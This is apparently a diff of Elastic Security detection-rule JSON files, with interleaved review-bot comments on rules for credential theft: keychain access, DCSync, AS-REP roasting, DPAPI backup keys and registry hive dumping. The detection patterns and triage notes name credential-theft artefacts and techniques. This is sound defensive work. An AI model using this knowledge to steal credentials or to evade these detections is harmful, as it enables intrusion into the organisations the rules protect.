Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file \nmodifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the `.csproj` file location.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target\nhost after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", + "query": "sequence by process.entity_id\n [process where event.type == \"start\" and (process.name : \"MSBuild.exe\" or process.pe.original_file_name == \"MSBuild.exe\")]\n [any where (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (dll.name : (\"vaultcli.dll\", \"SAMLib.DLL\") or file.name : (\"vaultcli.dll\", \"SAMLib.DLL\"))]\n", + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5", "severity": "high", @@ -44,5 +87,5 @@ } ], "type": "eql", - "version": 9 + "version": 11 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_credentials_keychains.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_credentials_keychains.json index 764d5b5969644..643d4b0a67911 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_credentials_keychains.json 
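Review bot: The new `note` carries copy-paste residue in its investigation steps: `searching for login events (for example, 4624) to the target host after the registry modification` refers to a registry modification, but this rule keys on the MSBuild process loading `vaultcli.dll`/`SAMLib.DLL` and nothing in the query touches the registry; suggest `...to the target host around the time of the library load`. The rewritten second sequence clause now also accepts `event.category == "process"` with `event.action : "Image loaded*"` and a `file.name` match, which the note's description (`This rule looks for the MSBuild process loading ...`) does not mention — one sentence such as `Image-load events reported as process events (event.action "Image loaded*", matched on file.name) are covered as well` would keep the note aligned with the query; which data source produces that branch is not visible here. The sequence still has no `maxspan`, so the two events may be arbitrarily far apart, as in the old query.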
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_credentials_keychains.json 
@@ -11,14 +11,37 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Access to Keychain Credentials Directories",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
- "query": "process where event.type in (\"start\", \"process_started\") and\n process.args :\n (\n \"/Users/*/Library/Keychains/*\",\n \"/Library/Keychains/*\",\n \"/Network/Library/Keychains/*\",\n \"System.keychain\",\n \"login.keychain-db\",\n \"login.keychain\"\n ) and\n not process.args : (\"find-certificate\",\n \"add-trusted-cert\",\n \"set-keychain-settings\",\n \"delete-certificate\",\n \"/Users/*/Library/Keychains/openvpn.keychain-db\",\n \"show-keychain-info\",\n \"lock-keychain\",\n \"set-key-partition-list\",\n \"import\",\n \"find-identity\") and\n not process.parent.executable : \"/Applications/OpenVPN Connect/OpenVPN Connect.app/Contents/MacOS/OpenVPN Connect\"\n",
+ "note": "",
+ "query": "process where event.type in (\"start\", \"process_started\") and\n process.args :\n (\n \"/Users/*/Library/Keychains/*\",\n \"/Library/Keychains/*\",\n \"/Network/Library/Keychains/*\",\n \"System.keychain\",\n \"login.keychain-db\",\n \"login.keychain\"\n ) and\n not process.args : (\"find-certificate\",\n \"add-trusted-cert\",\n \"set-keychain-settings\",\n \"delete-certificate\",\n \"/Users/*/Library/Keychains/openvpn.keychain-db\",\n \"show-keychain-info\",\n \"lock-keychain\",\n \"set-key-partition-list\",\n \"import\",\n \"find-identity\") and\n not process.parent.executable :\n (\n \"/Applications/OpenVPN Connect/OpenVPN Connect.app/Contents/MacOS/OpenVPN Connect\",\n \"/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise\",\n \"/opt/jc/bin/jumpcloud-agent\"\n ) and\n not process.executable : \"/opt/jc/bin/jumpcloud-agent\"\n",
 "references": [
 "https://objective-see.com/blog/blog_0x25.html",
 "https://securelist.com/calisto-trojan-for-macos/86543/"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.executable",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.executable",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "96e90768-c3b7-4df6-b5d9-6237f8bc36a8",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -53,5 +76,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 6
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dcsync_replication_rights.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dcsync_replication_rights.json
index e1ef3f255d4e5..f2c9f2a7d27d7 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dcsync_replication_rights.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dcsync_replication_rights.json
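Review bot: The two new exclusions in `query` for `/Applications/Microsoft Defender.app/.../wdavdaemon_enterprise` and `/opt/jc/bin/jumpcloud-agent` arrive in the same change that empties `note`, so the rule no longer records why they are tuned out; a false-positive line in the note such as `Endpoint security and device-management agents (Microsoft Defender, JumpCloud) read keychain paths during normal operation and are excluded by executable path` would give analysts the rationale and tell them what to re-check if those agents are not deployed. Because the exclusion is a path match only, it would be tighter to also constrain on `process.code_signature.subject_name` or `process.code_signature.trusted` where the data source populates those fields — not visible in this hunk, so left as a suggestion; `required_fields` would then need the code-signature entries too. The rule object continues past the end of the hunk.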
@@ -11,8 +11,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Credential Access via DCSync", - "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via DCSync\n\nActive Directory replication is the process by which the changes that originate on one domain controller are\nautomatically transferred to other domain controllers that store the same data.\n\nActive Directory data consists of objects that have properties, or attributes. Each object is an instance of an object\nclass, and object classes and their respective attributes are defined in the Active Directory schema. Objects are\ndefined by the values of their attributes, and changes to attribute values must be transferred from the domain\ncontroller on which they occur to every other domain controller that stores a replica of an affected object. \n\nAdversaries can use the DCSync technique that uses Windows Domain Controller's API to simulate the replication process\nfrom a remote domain controller, compromising major credential material such as the Kerberos krbtgt keys used\nlegitimately for tickets creation, but also tickets forging by attackers. This attack requires some extended privileges\nto succeed (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), which are granted by default to members of\nthe Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups. 
Privileged accounts can be abused\nto grant controlled objects the right to DCsync/Replicate.\n\nMore details can be found on [Threat Hunter Playbook](https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing) and [The Hacker Recipes](https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync).\n\nThis rule monitors for Event ID 4662 (Operation was performed on an Active Directory object) and identifies events that\nuse the access mask 0x100 (Control Access) and properties that contain at least one of the following or their equivalent:\nSchema-Id-GUID (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, DS-Replication-Get-Changes-In-Filtered-Set).\nIt also filters out events that use computer accounts and also Azure AD Connect MSOL accounts (more details [here](https://techcommunity.microsoft.com/t5/microsoft-defender-for-identity/ad-connect-msol-user-suspected-dcsync-attack/m-p/788028)). \n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Correlate security events 4662 and 4624 (Logon Type 3) by their Logon ID (`winlog.logon.id`) on the Domain Controller\n(DC) that received the replication request. This will tell you where the AD replication request came from, and if it\ncame from another DC or not.\n- Scope which credentials were compromised (for example, whether all accounts were replicated or specific ones).\n\n### False positive analysis \n\n- This activity should not happen legitimately, since replication should be done by Domain Controllers only. Any\npotential benign true positive (B-TP) should be mapped and monitored by the security team. 
Any account that performs\nthis activity can put the domain at risk for not having the same security standards as computer accounts (which have\nlong, complex, random passwords that change frequently), exposing it to credential cracking attacks (Kerberoasting,\nbrute force, etc.).\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If specific credentials were compromised:\n - Reset the password for these accounts and other potentially compromised credentials, like email, business systems,\n and web services.\n- If the entire domain or the `krbtgt` user were compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited\n to, a password reset (twice) of the `krbtgt` user.\n- Investigate how the attacker escalated privileges and identify systems they used to conduct lateral movement. Use this\ninformation to scope ways that the attacker could use to regain access to the environment.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to 
work.\n", - "query": "any where event.action == \"Directory Service Access\" and\n event.code == \"4662\" and winlog.event_data.Properties : (\n\n /* Control Access Rights/Permissions Symbol */\n\n \"*DS-Replication-Get-Changes*\",\n \"*DS-Replication-Get-Changes-All*\",\n \"*DS-Replication-Get-Changes-In-Filtered-Set*\",\n\n /* Identifying GUID used in ACE */\n\n \"*1131f6ad-9c07-11d1-f79f-00c04fc2dcd2*\",\n \"*1131f6aa-9c07-11d1-f79f-00c04fc2dcd2*\",\n \"*89e95b76-444d-4c62-991a-0facbeda640c*\") \n \n /* The right to perform an operation controlled by an extended access right. */\n\n and winlog.event_data.AccessMask : \"0x100\" and\n not winlog.event_data.SubjectUserName : (\"*$\", \"MSOL_*\")\n", + "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via DCSync\n\nActive Directory replication is the process by which the changes that originate on one domain controller are\nautomatically transferred to other domain controllers that store the same data.\n\nActive Directory data consists of objects that have properties, or attributes. Each object is an instance of an object\nclass, and object classes and their respective attributes are defined in the Active Directory schema. Objects are\ndefined by the values of their attributes, and changes to attribute values must be transferred from the domain\ncontroller on which they occur to every other domain controller that stores a replica of an affected object.\n\nAdversaries can use the DCSync technique that uses Windows Domain Controller's API to simulate the replication process\nfrom a remote domain controller, compromising major credential material such as the Kerberos krbtgt keys used\nlegitimately for tickets creation, but also tickets forging by attackers. 
This attack requires some extended privileges\nto succeed (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), which are granted by default to members of\nthe Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups. Privileged accounts can be abused\nto grant controlled objects the right to DCsync/Replicate.\n\nMore details can be found on [Threat Hunter Playbook](https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing) and [The Hacker Recipes](https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync).\n\nThis rule monitors for Event ID 4662 (Operation was performed on an Active Directory object) and identifies events that\nuse the access mask 0x100 (Control Access) and properties that contain at least one of the following or their equivalent:\nSchema-Id-GUID (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, DS-Replication-Get-Changes-In-Filtered-Set).\nIt also filters out events that use computer accounts and also Azure AD Connect MSOL accounts (more details [here](https://techcommunity.microsoft.com/t5/microsoft-defender-for-identity/ad-connect-msol-user-suspected-dcsync-attack/m-p/788028)).\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Correlate security events 4662 and 4624 (Logon Type 3) by their Logon ID (`winlog.logon.id`) on the Domain Controller\n(DC) that received the replication request. 
This will tell you where the AD replication request came from, and if it\ncame from another DC or not.\n- Scope which credentials were compromised (for example, whether all accounts were replicated or specific ones).\n\n### False positive analysis\n\n- This activity should not happen legitimately, since replication should be done by Domain Controllers only. Any\npotential benign true positive (B-TP) should be mapped and monitored by the security team. Any account that performs\nthis activity can put the domain at risk for not having the same security standards as computer accounts (which have\nlong, complex, random passwords that change frequently), exposing it to credential cracking attacks (Kerberoasting,\nbrute force, etc.).\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If specific credentials were compromised:\n - Reset the password for these accounts and other potentially compromised credentials, like email, business systems,\n and web services.\n- If the entire domain or the `krbtgt` user were compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited\n to, a password reset (twice) of the `krbtgt` user.\n- Investigate how the attacker escalated privileges and identify systems they used to conduct lateral movement. 
Use this\ninformation to scope ways that the attacker could use to regain access to the environment.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "any where event.action == \"Directory Service Access\" and\n event.code == \"4662\" and winlog.event_data.Properties : (\n\n /* Control Access Rights/Permissions Symbol */\n\n \"*DS-Replication-Get-Changes*\",\n \"*DS-Replication-Get-Changes-All*\",\n \"*DS-Replication-Get-Changes-In-Filtered-Set*\",\n\n /* Identifying GUID used in ACE */\n\n \"*1131f6ad-9c07-11d1-f79f-00c04fc2dcd2*\",\n \"*1131f6aa-9c07-11d1-f79f-00c04fc2dcd2*\",\n \"*89e95b76-444d-4c62-991a-0facbeda640c*\")\n\n /* The right to perform an operation controlled by an extended access right. */\n\n and winlog.event_data.AccessMask : \"0x100\" and\n not winlog.event_data.SubjectUserName : (\"*$\", \"MSOL_*\")\n", "references": [ "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-180815210510.html", "https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing", 
@@ -21,8 +21,36 @@
 "https://attack.stealthbits.com/privilege-escalation-using-mimikatz-dcsync",
 "https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.code",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "winlog.event_data.AccessMask",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "winlog.event_data.Properties",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "winlog.event_data.SubjectUserName",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "9f962927-1a4f-45f3-a57b-287f2c7029c1",
+ "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -58,5 +86,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 3
+ "version": 5
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_disable_kerberos_preauth.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_disable_kerberos_preauth.json
index 3d72d63489242..f09e9bd47a4a8 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_disable_kerberos_preauth.json
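Review bot: The new `setup` text names the wrong audit subcategory: event 4662, which the query in the preceding hunk keys on via `event.code == "4662"`, is emitted by the 'Audit Directory Service Access' subcategory, while 'Audit Directory Service Changes' produces the 5136–5141 events and will not make this rule fire. Suggest `The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).` for the opening sentence and `Audit Directory Service Access (Success,Failure)` as the last line of the policy path. The `required_fields` entries for `winlog.event_data.Properties` and `winlog.event_data.AccessMask` are typed `unknown` even though the query wildcard-matches both; if a `keyword` mapping is what the match semantics assume, it is worth stating that here rather than leaving it to the index template.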
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_disable_kerberos_preauth.json 
@@ -11,15 +11,28 @@ "language": "kuery", "license": "Elastic License v2", "name": "Kerberos Pre-authentication Disabled for User", - "note": "## Triage and analysis\n\n### Investigating Kerberos Pre-authentication Disabled for User\n\nKerberos pre-authentication is an account protection against offline password cracking. When enabled, a user requesting\naccess to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request\n(AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to\nsuccessfully decrypt the timestamp with the hash of the user\u2019s password, it will then send an Authentication Server\nResponse (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is\nsigned with the user\u2019s password. Microsoft's security monitoring [recommendations](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738) state that `'Don't Require Preauth' \u2013 Enabled` should not be enabled for user accounts because it weakens security for the account\u2019s Kerberos authentication.\n\nAS-REP roasting is an attack against Kerberos for user accounts that do not require pre-authentication, which means that\nif the target user has pre-authentication disabled, an attacker can request authentication data for it and get a TGT that\ncan be brute-forced offline, similarly to Kerberoasting.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Determine if the target account is sensitive or privileged.\n- Inspect the account activities for suspicious or abnormal behaviors in the alert timeframe.\n\n### False positive analysis\n\n- Disabling pre-authentication is a bad security practice and should not be allowed in the 
domain. The security team\nshould map and monitor any potential benign true positives (B-TPs), especially if the target account is privileged.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Reset the target account's password if there is any risk of TGTs having been retrieved.\n- Re-enable the preauthentication option or disable the target account.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nPolicies > \nWindows Settings > \nSecurity Settings > \nAdvanced Audit Policies Configuration > \nAudit Policies > \nAccount Management > \nAudit User Account Management (Success,Failure)\n```\n", + "note": "## Triage and analysis\n\n### Investigating Kerberos Pre-authentication Disabled for User\n\nKerberos pre-authentication is an account protection against offline password cracking. When enabled, a user requesting\naccess to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request\n(AS-REQ) message with a timestamp that is encrypted with the hash of their password. 
If and only if the DC is able to\nsuccessfully decrypt the timestamp with the hash of the user\u2019s password, it will then send an Authentication Server\nResponse (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is\nsigned with the user\u2019s password. Microsoft's security monitoring [recommendations](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738) state that `'Don't Require Preauth' \u2013 Enabled` should not be enabled for user accounts because it weakens security for the account\u2019s Kerberos authentication.\n\nAS-REP roasting is an attack against Kerberos for user accounts that do not require pre-authentication, which means that\nif the target user has pre-authentication disabled, an attacker can request authentication data for it and get a TGT that\ncan be brute-forced offline, similarly to Kerberoasting.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Determine if the target account is sensitive or privileged.\n- Inspect the account activities for suspicious or abnormal behaviors in the alert timeframe.\n\n### False positive analysis\n\n- Disabling pre-authentication is a bad security practice and should not be allowed in the domain. 
The security team\nshould map and monitor any potential benign true positives (B-TPs), especially if the target account is privileged.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Reset the target account's password if there is any risk of TGTs having been retrieved.\n- Re-enable the preauthentication option or disable the target account.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.code:4738 and message:\"'Don't Require Preauth' - Enabled\"\n", "references": [ "https://harmj0y.medium.com/roasting-as-reps-e6179a65216b", "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738", "https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0026_windows_audit_user_account_management.md" ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "message", + "type": "match_only_text" + } + ], "risk_score": 47, "rule_id": "e514d8cd-ed15-4011-84e2-d15147e059f1", + "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit User Account Management (Success,Failure)\n```", 
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -54,5 +67,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 3
+ "version": 5
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_domain_backup_dpapi_private_keys.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_domain_backup_dpapi_private_keys.json
index 11e0861ad950b..23d6a88725288 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_domain_backup_dpapi_private_keys.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_domain_backup_dpapi_private_keys.json
@@ -12,14 +12,27 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Creation or Modification of Domain Backup DPAPI private key",
- "note": "## Triage and analysis\n\nDomain DPAPI Backup keys are stored on domain controllers and can be dumped remotely with tools such as Mimikatz. The resulting .pvk private key can be used to decrypt ANY domain user masterkeys, which then can be used to decrypt any secrets protected by those keys.\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
+ "note": "## Triage and analysis\n\nDomain DPAPI Backup keys are stored on domain controllers and can be dumped remotely with tools such as Mimikatz. The resulting .pvk private key can be used to decrypt ANY domain user masterkeys, which then can be used to decrypt any secrets protected by those keys.",
 "query": "file where event.type != \"deletion\" and file.name : (\"ntds_capi_*.pfx\", \"ntds_capi_*.pvk\")\n",
 "references": [
 "https://www.dsinternals.com/en/retrieving-dpapi-backup-keys-from-active-directory/",
 "https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "b83a7e96-2eb3-4edf-8346-427b6858d3bd",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
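Review bot: With the Config section moved into `setup`, the new `note` is a single background paragraph under a '## Triage and analysis' heading and carries no investigation or response steps, unlike the other rules rewritten in this commit (the registry-hive and Kerberos pre-authentication notes both have 'Possible investigation steps' and 'Response and remediation' sections). Consider adding at least a short investigation list — identify the process and account that created or modified the `ntds_capi_*.pfx`/`.pvk` file, confirm whether it was a sanctioned backup, and treat the domain backup key and dependent DPAPI secrets as exposed if it was not — so analysts get the same triage scaffolding as the sibling rules.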
@@ -59,5 +72,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 8
+ "version": 10
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dump_registry_hives.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dump_registry_hives.json
index f57fe0d372a24..9fe12c071641a 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dump_registry_hives.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dump_registry_hives.json
@@ -12,13 +12,31 @@ "language": "eql", "license": "Elastic License v2", "name": "Credential Acquisition via Registry Hive Dumping", - "note": "## Triage and analysis\n\n### Investigating Credential Acquisition via Registry Hive Dumping\n\nDumping registry hives is a common way to access credential information as some hives store credential material.\n\nFor example, the SAM hive stores locally cached credentials (SAM Secrets), and the SECURITY hive stores domain cached\ncredentials (LSA secrets).\n\nDumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nThis rule identifies the usage of `reg.exe` to dump SECURITY and/or SAM hives, which potentially indicates the\ncompromise of the credentials stored in the host.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the credential material was exfiltrated or processed locally by other tools.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (e.g., 4624) to the target\nhost.\n\n### False positive analysis\n\n- Administrators can export registry hives for backup purposes using command line tools like `reg.exe`. 
Check whether\nthe user is legitamitely performing this kind of activity.\n\n### Related rules\n\n- Registry Hive File Creation via SMB - a4c7473a-5cb4-4bc1-9d06-e4a75adbc494\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": 